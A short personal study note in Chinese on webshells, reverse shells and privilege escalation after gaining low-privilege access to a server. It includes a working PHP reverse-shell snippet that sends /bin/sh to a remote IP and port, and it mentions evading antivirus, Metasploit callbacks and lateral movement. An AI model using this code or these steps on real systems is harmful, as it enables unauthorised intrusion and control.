我之前以为上传一个webshell然后连接就可以了。然后我今天发现那个shell只能让我连接上去。权限很低。
上传webshell有两种
一种是可以直接上传文件的 我们可以把shell写入文件里(木马可以很厉害级别)
另一种是可以写入命令然后执行命令(不能直接上传webshell但是可以手写webshell进去)
我今天遇到的就是第二种。我可以写一个php文件然后往里面写shell 要考虑的问题应该是 怎么上传厉害的webshell提权 然后保持状态免杀。
反弹端口:
https://www.leavesongs.com/PHP/backshell-via-php.html
$sock = fsockopen($ip, $port);
$descriptorspec = array(
0 => $sock,
1 => $sock,
2 => $sock
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);
现在的工具:cknief
提权和当前用户权限有很大关系。如果用户只有可读可写权限怎么提权呢。” 权限”(Permission)是针对资源而言的。也就是说,设置权限只能是以资源为对象,即”设置某个文件夹有哪些用户可以拥有相应的权限”,而不能是以用户为主,即”设置某个用户可以对哪些资源拥有权限”。这就意味着”权限”必须针对”资源”而言,脱离了资源去谈权限毫无意义──在提到权限的具体实施时,”某个资源”是必须存在的。
常规的方法
上传webshell查看系统systeminfo 补丁然后搜索其他漏洞 使用msf反弹端口连接 然后针对某个漏洞进行攻击(明确可能存在某个漏洞后)然后内网渗透 横向纵向 使用其他提权工具
如果没有可执行权限呢 可以使用cmd.exehttps://blog.csdn.net/iteye_2449/article/details/81336411 (待实验)